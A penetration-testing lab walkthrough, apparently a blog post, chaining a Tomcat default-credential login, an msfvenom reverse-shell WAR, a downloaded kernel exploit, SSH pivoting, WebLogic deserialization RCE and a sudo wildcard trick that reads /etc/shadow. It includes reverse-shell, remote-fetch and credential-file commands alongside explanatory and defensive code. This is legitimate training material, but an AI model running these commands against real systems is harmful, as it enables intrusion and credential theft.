PT Exercise




Let's start the fun with an nmap scan of our victim machine.


We found multiple services running, including Apache, NetBIOS, an NFS share and Tomcat. Whenever I find Tomcat, I think of the Tomcat default credentials and the WAR file upload exploit.

Exploit Scenario

First I visited the Tomcat manager interface and tried the default tomcat:tomcat credentials, and they let me log in to the manager.


Next I created a WAR file payload with msfvenom that spawns a reverse shell connecting back to my attacker machine on port 4443, and named the file webshell.war:

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4443 -f war > webshell.war


Next we need the name of the JSP file inside the archive so we can request it; jar -tf webshell.war lists the archive's contents.


Next we start a listener on port 4443 and trigger the payload by requesting the JSP, either with wget or by visiting the URL in the browser.

We get a shell on the first victim as the tomcat7 user.
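The WAR step above hides two details worth understanding: what the archive actually contains, and how Tomcat maps an entry inside it to a URL (the WAR's base name becomes the context path, so webshell.war is served under /webshell/). The following is an added example, not code from the original post; it builds a minimal WAR with Python's zipfile module (the JSP body is a constructed, benign marker page standing in for the msfvenom payload), lists the entries the way jar -tf does, and derives the URL to request. The base URL 10.0.0.1:8080 is a placeholder.

```python
"""Build a minimal WAR archive and work out which URL triggers its JSP."""
import io
import zipfile

# Constructed, benign JSP: reports the account the servlet container runs as.
# The walkthrough's real payload was generated by msfvenom; this stands in for it.
JSP_BODY = """<%
    // Hypothetical marker page, not a shell.
    out.println("running as: " + System.getProperty("user.name"));
%>
"""

# Minimal deployment descriptor; Tomcat accepts a WAR with an empty web-app element.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
</web-app>
"""


def build_war(jsp_name="cmd.jsp"):
    """Return the bytes of a WAR containing WEB-INF/web.xml and one JSP at the root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, JSP_BODY)
    return buf.getvalue()


def list_entries(war_bytes):
    """Equivalent of `jar -tf webshell.war`: every entry in the archive, in order."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.namelist()


def jsp_urls(war_bytes, base_url, war_filename):
    """Map each servable .jsp entry to the URL Tomcat exposes it at.

    Tomcat deploys foo.war under the context path /foo, so an entry x.jsp at
    the archive root is reachable at <base>/foo/x.jsp. Anything under WEB-INF/
    is never served directly, so it is skipped.
    """
    context = war_filename[:-4] if war_filename.endswith(".war") else war_filename
    return [
        f"{base_url.rstrip('/')}/{context}/{name}"
        for name in list_entries(war_bytes)
        if name.endswith(".jsp") and not name.startswith("WEB-INF/")
    ]


if __name__ == "__main__":
    war = build_war()
    print(list_entries(war))
    print(jsp_urls(war, "http://10.0.0.1:8080", "webshell.war"))
```

msfvenom gives the JSP a random name, which is exactly why the author had to list the archive before requesting it. If you would rather script the deployment than click through the manager GUI, Tomcat's text interface accepts an HTTP PUT of the WAR at /manager/text/deploy?path=/webshell, but that needs the manager-script role, not just manager-gui.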

Privilege Escalation

Once I have a shell and want to escalate privileges, I always check which commands I can run as root with sudo.

Unfortunately I can't run any commands with sudo. Let's check the kernel version with uname -v.


Some Google foo shows that this kernel is vulnerable to a known privilege escalation exploit, so we can grab the exploit code from the internet: 39166.c

First I have to get the exploit code onto the victim machine. I started a Python HTTP server on my attacker machine with python -m SimpleHTTPServer, which serves the current directory on port 8000, then ran wget from the reverse shell to fetch the code into /tmp.


Finally we compile the code, run the exploit, and voila, we have a root shell.



First let's run ifconfig to check whether our victim is connected to another network.


We can see that it has a second IP address, so now we need a way to use this machine as a pivot into the other network. Recalling an article on how Hacking got hacked, I remembered a technique for this using SSH dynamic tunneling and proxychains.

So first I started the SSH daemon, since the nmap results showed no SSH running, and I also changed the root password so that I could establish an SSH session. (That is fine in a lab; on a real engagement you would rather drop your own key into /root/.ssh/authorized_keys than alter existing credentials, and you would record the change so it can be reverted.)


Next I ran the command below, which creates what is called a dynamic tunnel with the -D option: a SOCKS proxy on a local port whose connections are forwarded out through the SSH server.

ssh -D 9090 root@


Once the SSH session is up, the SOCKS proxy is listening on local port 9090. Next we configure proxychains to use this port: in the [ProxyList] section of /etc/proxychains.conf, replace the default Tor entry (socks4 127.0.0.1 9050) with socks5 127.0.0.1 9090.

From then on we prefix any command that needs to reach the other subnet with proxychains.

Next we run an nmap sweep through proxychains, which relays each connection over the SSH tunnel on port 9090 into the other subnet: sudo proxychains nmap -Pn. Note that proxychains only intercepts TCP connect() calls, so ICMP pings and raw SYN scans never enter the tunnel; -Pn skips host discovery, and a TCP connect scan (-sT) is the only scan type that will actually go through the proxy.
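To see what proxychains is doing for every connection in that sweep, here is the SOCKS5 exchange it performs against the ssh -D proxy, as an added example that is not part of the original post. It builds the client greeting and CONNECT request, parses the server reply, and wraps the whole handshake around a socket so a plain TCP client can reach a host in the far subnet. The proxy address 127.0.0.1:9090 follows the post; the target 10.0.0.5 is a placeholder. The protocol only carries TCP streams (OpenSSH's -D implements CONNECT but not UDP ASSOCIATE), which is the reason ping and SYN scans cannot ride the tunnel.

```python
"""Minimal SOCKS5 client: the handshake proxychains runs through an `ssh -D` proxy."""
import ipaddress
import socket
import struct

SOCKS_VERSION = 5
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 1, 3, 4
REPLY_TEXT = {
    0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def build_greeting():
    """Client hello: version 5, one method offered, 0x00 = no authentication."""
    return bytes([SOCKS_VERSION, 1, 0x00])


def build_connect_request(host, port):
    """CONNECT request; literal IPs are sent raw, anything else as a domain name."""
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data):
    """Parse a server reply; return (reply_code, bound_host, bound_port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    code, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, off = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == ATYP_IPV6:
        host, off = str(ipaddress.IPv6Address(data[4:20])), 20
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, off = data[5:5 + n].decode(), 5 + n
    else:
        raise ValueError("unknown address type %d" % atyp)
    (port,) = struct.unpack("!H", data[off:off + 2])
    return code, host, port


def _recv_exact(sock, n):
    """Read exactly n bytes or fail; recv() may return short reads."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks_connect(proxy_host, proxy_port, target_host, target_port, timeout=5):
    """Open a TCP connection to target via the SOCKS proxy and return the socket."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        sock.sendall(build_greeting())
        ver, method = _recv_exact(sock, 2)
        if ver != SOCKS_VERSION or method != 0x00:
            raise ConnectionError("proxy refused the no-auth method")
        sock.sendall(build_connect_request(target_host, target_port))
        head = _recv_exact(sock, 4)            # VER REP RSV ATYP
        if head[3] == ATYP_IPV4:
            rest = _recv_exact(sock, 4 + 2)
        elif head[3] == ATYP_IPV6:
            rest = _recv_exact(sock, 16 + 2)
        else:
            n = _recv_exact(sock, 1)
            rest = n + _recv_exact(sock, n[0] + 2)
        code, _, _ = parse_reply(head + rest)
        if code != 0:
            raise ConnectionError("SOCKS CONNECT failed: " + REPLY_TEXT.get(code, str(code)))
        return sock
    except Exception:
        sock.close()
        raise


if __name__ == "__main__":
    # Assumes the `ssh -D 9090` session from the post is up; target is a placeholder.
    s = socks_connect("127.0.0.1", 9090, "10.0.0.5", 7001)
    print("connected through the pivot, local end", s.getsockname())
    s.close()
```

Every TCP connection nmap makes under proxychains turns into one of these exchanges, so a connect scan of a /24 on a handful of ports is slow; narrowing the port list is worth more than tuning nmap's timing here.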


After excluding and the other specific IPs, we can conclude that our next victim will be

Let's nmap this host through proxychains.

We found two open ports. First I wanted to browse to port 7001, but unfortunately proxychains couldn't do that for me. The solution was a local SSH port forward so I could reach port 7001: ssh -L 7000: root@ means that we connect to localhost port 7000 and the traffic is tunneled to port 7001 on our victim.


Next, from the browser we visit http://localhost:7000 and find that it is Oracle WebLogic.


WebLogic is Oracle's Java EE application server (middleware), commonly used to host enterprise applications and connect them to each other through servlets and other Java EE components.

Some Google foo shows that it is vulnerable to a Java deserialization exploit that leads to RCE.

I found many write-ups on exploiting Java deserialization vulnerabilities in Oracle WebLogic, including this one.

The only challenge was how to get a reverse shell from the second victim, which is not on our network.

Again we can use SSH tunneling, but this time a remote (reverse) tunnel.

We need a remote tunnel that lets the second victim connect back to our Linux Mint attacker machine on port 4444.

So first I created the bash reverse shell script; when executed, it makes a reverse shell connection to our first victim on port 8888.

Then we create a remote tunnel that forwards everything arriving on port 8888 to port 4444 on our machine: ssh -R root@

Once the SSH connection between the attacker machine and the first victim is established, this command creates a listener on the first victim on port 8888, and any connection to that port is forwarded to the attacker machine on port 4444. One caveat: by default sshd binds a -R listener to the loopback interface only, so the second victim could not reach port 8888 on the first victim's other interface; the first victim's sshd_config needs GatewayPorts yes (or clientspecified together with an explicit bind address in the -R argument) for this to work.


But how do we get this bash script onto the vulnerable WebLogic server? The solution is to host it on our Python SimpleHTTPServer on port 8000 and create another remote tunnel to that web server with

ssh -R root@

So now let's exploit the WebLogic Java deserialization vulnerability.

Let's use the exploit code from this blog:

python [victim host and port] [path to the ysoserial jar, which generates the Java payloads] [command to execute]

python localhost 7000 ../ysoserial-0.0.2-all.jar 'wget'

Connecting to will end up at our machine on port 8000, which is the Python HTTP web server.


In the Python web server log we can see a GET request for the bash file, which means the exploit is working; the only thing missing is to execute the script.


So now let's run the exploit, which makes a reverse connection to that is tunneled to using the command

ssh -R root@

We also have to start our listener on port 4444 (for example nc -lvnp 4444).

Finally, when we execute python localhost 7000 ../ysoserial-0.0.2-all.jar 'sh' we get ourselves a shell.


Misconfiguration to root

As always, once I get a shell I check which commands I can run as root using sudo.


I find that I can run /bin/cat /root/backup/*

Great, that is a misconfiguration we can take advantage of. sudoers matches command-line arguments with fnmatch(3), and in the argument position the * also matches slashes, so we can use sudo to cat something under /root/backup/, go two directories back with ../.., and read any file on the system as root.

So let's read the shadow file with

sudo /bin/cat /root/backup/../../etc/shadow


Finally I cracked the root password with John the Ripper: it was mario101.
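The sudo trick above works because of how sudoers compares arguments, and the same wildcard also matches spaces, so a second argument slips through as well. The following is an added example, not code from the original post: it emulates the sudoers argument match with Python's fnmatch, shows the normalization check a safe wrapper script would need instead, and scans a constructed sudoers snippet for rules whose arguments carry wildcards. The sudoers lines are made up for the demonstration.

```python
"""Why `sudo /bin/cat /root/backup/*` reads any file, and how to spot such rules."""
import fnmatch
import posixpath
import re


def sudoers_args_match(rule_args, actual_args):
    """Emulate how sudoers compares command-line arguments against a rule.

    sudoers joins the arguments into a single string and runs fnmatch(3) on it
    without FNM_PATHNAME, so '*' matches '/' and ' ' as well as ordinary chars.
    """
    return fnmatch.fnmatchcase(" ".join(actual_args), " ".join(rule_args))


def stays_under(base_dir, path):
    """The check a wrapper script should do: does the normalized path stay under base_dir?"""
    resolved = posixpath.normpath(posixpath.join(base_dir, path))
    base = base_dir.rstrip("/")
    return resolved == base or resolved.startswith(base + "/")


_RUNAS = re.compile(r"^\s*\([^)]*\)")   # strips a leading "(root)" / "(ALL:ALL)"


def risky_wildcard_rules(sudoers_text):
    """Return every command spec whose *arguments* contain a glob character."""
    risky = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue                                 # comments, Defaults, aliases
        spec = _RUNAS.sub("", line.split("=", 1)[1])
        cmds = spec.rsplit(":", 1)[-1]               # drop tags such as NOPASSWD:
        for cmd in cmds.split(","):
            parts = cmd.split()
            if len(parts) > 1 and any(ch in " ".join(parts[1:]) for ch in "*?["):
                risky.append(cmd.strip())
    return risky


# Constructed sudoers snippet for the demonstration (not from the target machine).
SAMPLE_SUDOERS = """\
# Sample rules
tomcat ALL=(root) NOPASSWD: /bin/cat /root/backup/*
bob    ALL=(ALL:ALL) ALL
alice  ALL=/usr/bin/apt-get update, /bin/ls /var/log/*
"""

if __name__ == "__main__":
    rule = ["/root/backup/*"]
    print(sudoers_args_match(rule, ["/root/backup/../../etc/shadow"]))   # traversal
    print(sudoers_args_match(rule, ["/root/backup/x", "/etc/shadow"]))  # second argument
    print(stays_under("/root/backup", "/root/backup/../../etc/shadow"))
    print(risky_wildcard_rules(SAMPLE_SUDOERS))
```

The defensive lesson is that no sudoers glob expresses "files inside this directory"; grant a small wrapper script that validates its argument with a check like stays_under, or give the user the specific files they need.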

Thanks, I hope you enjoyed reading.



